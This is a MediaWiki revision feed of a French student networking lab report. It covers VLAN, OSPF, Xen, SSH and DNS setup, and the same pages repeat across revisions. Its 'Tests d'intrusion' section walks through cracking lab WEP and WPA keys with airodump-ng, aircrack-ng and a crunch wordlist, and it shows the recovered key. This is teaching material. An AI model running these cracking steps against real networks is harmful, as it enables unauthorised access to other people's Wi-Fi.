Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
=== Tests d’intrusion ===&lt;br /&gt;
== WEP ==&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
== Intrusion sur un serveur d’application Web ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
=== Inspection ARP par un élément réseau ===&lt;br /&gt;
===  Sécurisation WiFi par WPA2-EAP ===&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57042</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57042"/>
				<updated>2021-12-13T16:28:10Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* WPA */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 86400&lt;br /&gt;
 @       IN      SOA     ns.anosteke59.site.      postmaster.anosteke59.site. (&lt;br /&gt;
                         2021112901      ; serial number YYMMDDNN&lt;br /&gt;
                         28800           ; Refresh&lt;br /&gt;
                         7200            ; Retry&lt;br /&gt;
                         864000          ; Expire&lt;br /&gt;
                         86400           ; Min TTL&lt;br /&gt;
                         )&lt;br /&gt;
                 NS      ns.anosteke59.site.&lt;br /&gt;
                 NS      ns6.gandi.net. &lt;br /&gt;
 $ORIGIN anosteke59.site.&lt;br /&gt;
 ns  IN A   193.48.57.182&lt;br /&gt;
 www IN CNAME ns&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
nslookup anosteke59.site &lt;br /&gt;
dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
=== Tests d’intrusion ===&lt;br /&gt;
== WEP ==&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 44:DA:D2:9C:50:53 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 3 --bssid 44:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
== Intrusion sur un serveur d’application Web ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
=== Inspection ARP par un élément réseau ===&lt;br /&gt;
===  Sécurisation WiFi par WPA2-EAP ===&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56979</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56979"/>
				<updated>2021-12-13T15:09:43Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 86400&lt;br /&gt;
 @       IN      SOA     ns.anosteke59.site.      postmaster.anosteke59.site. (&lt;br /&gt;
                         2021112901      ; serial number YYMMDDNN&lt;br /&gt;
                         28800           ; Refresh&lt;br /&gt;
                         7200            ; Retry&lt;br /&gt;
                         864000          ; Expire&lt;br /&gt;
                         86400           ; Min TTL&lt;br /&gt;
                         )&lt;br /&gt;
                 NS      ns.anosteke59.site.&lt;br /&gt;
                 NS      ns6.gandi.net. &lt;br /&gt;
 $ORIGIN anosteke59.site.&lt;br /&gt;
 ns  IN A   193.48.57.182&lt;br /&gt;
 www IN CNAME ns&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
nslookup anosteke59.site &lt;br /&gt;
dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
=== Tests d’intrusion ===&lt;br /&gt;
== WEP ==&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 44:DA:D2:9C:50:53 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 3 --bssid 44:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
